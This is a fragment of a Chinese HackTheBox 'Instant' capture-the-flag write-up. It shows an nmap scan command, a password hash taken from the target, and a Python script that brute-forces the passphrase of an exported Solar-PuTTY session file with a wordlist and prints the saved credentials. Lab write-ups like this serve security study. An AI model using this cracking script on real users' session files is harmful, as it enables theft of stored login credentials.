知识点:APK 反编译、本地文件包含(LFI)、Solar-PuTTY 会话(Session)文件解密
nmap -sC -sV -O -oN nmap.txt 10.10.11.36
pbkdf2:sha256:600000$YnRgjnim$c9541a8c6ad40bc064979bc446025041ffac9af2f762726971d8a28272c550ed
import base64
import sys
from Crypto.Cipher import DES3
from Crypto.Protocol.KDF import PBKDF2
def decrypt(passphrase, ciphertext):
    """Try to decrypt a base64-encoded Solar-PuTTY session export.

    The decoded blob is read as: bytes 0-23 salt, bytes 24-31 IV, and
    the encrypted payload from offset 48 onwards (bytes 32-47 are not
    used by this function). The 24-byte Triple DES key is derived from
    *passphrase* with PBKDF2 at 1000 iterations; that is a low count,
    so the protection of an exported session file rests almost
    entirely on the strength of its passphrase.

    Args:
        passphrase: Candidate passphrase for the export.
        ciphertext: Base64 text read from the session file.

    Returns:
        The decrypted payload reduced to its ASCII characters, or an
        empty string if any step raised (the error is printed).

    Note:
        Nothing here proves the passphrase was right. The padding is
        stripped without being checked, so a wrong key yields garbage
        rather than an error; the caller must recognise valid output.
    """
    plaintext = ''
    try:
        blob = base64.b64decode(ciphertext)
        # Fixed layout: salt | IV | (16 skipped bytes) | encrypted payload.
        salt, iv, payload = blob[:24], blob[24:32], blob[48:]
        # dkLen=24 gives a three-key Triple DES key.
        key = PBKDF2(passphrase, salt, dkLen=24, count=1000)
        raw = DES3.new(key, DES3.MODE_CBC, iv).decrypt(payload)
        # PKCS7-style strip: the last byte is taken as the pad length.
        # It is trusted as-is, so a pad byte of 0 leaves nothing behind.
        pad = raw[-1]
        unpadded = raw[:-pad]
        # Drop every byte that does not map to an ASCII character.
        plaintext = ''.join(ch for ch in map(chr, unpadded) if ch.isascii())
    except Exception as exc:
        # Best-effort by design: report the failure and return ''.
        print(f'Error: {exc}')
    return plaintext
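# Command-line driver: try each line of a wordlist as the passphrase
# for one exported Solar-PuTTY session file and stop at the first
# candidate whose output looks like session data.
if len(sys.argv) < 3:
    print(f'Usage: {sys.argv[0]} putty_session.dat wordlist.txt')
    # sys.exit instead of the site-provided exit(), which is not
    # guaranteed to exist outside the interactive interpreter.
    sys.exit(1)

# The session file holds a single base64 blob; read it once and reuse it.
with open(sys.argv[1]) as f:
    cipher = f.read()

with open(sys.argv[2]) as passwords:
    for i, password in enumerate(passwords):
        password = password.strip()
        decrypted = decrypt(password, cipher)
        # '\r' moves the cursor back to column 0 so the progress line
        # is overwritten in place (the listing had lost the backslash
        # and printed a literal 'r' after every candidate).
        print(f'[{i}] {password=}', end='\r')
        # decrypt() cannot tell a right key from a wrong one; the
        # 'Credentials' marker in the output is the only success signal.
        if 'Credentials' in decrypted:
            # Trailing spaces wipe the remains of a longer progress line.
            print(f'\r[{i}] {password=} {" " * 10}')
            print()
            # NOTE: this writes the recovered session data, stored
            # credentials included, to the terminal in clear text.
            print(decrypted)
            break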
原文始发于微信公众号(Rsec):HTB靶场 Instant(Linux)[Me]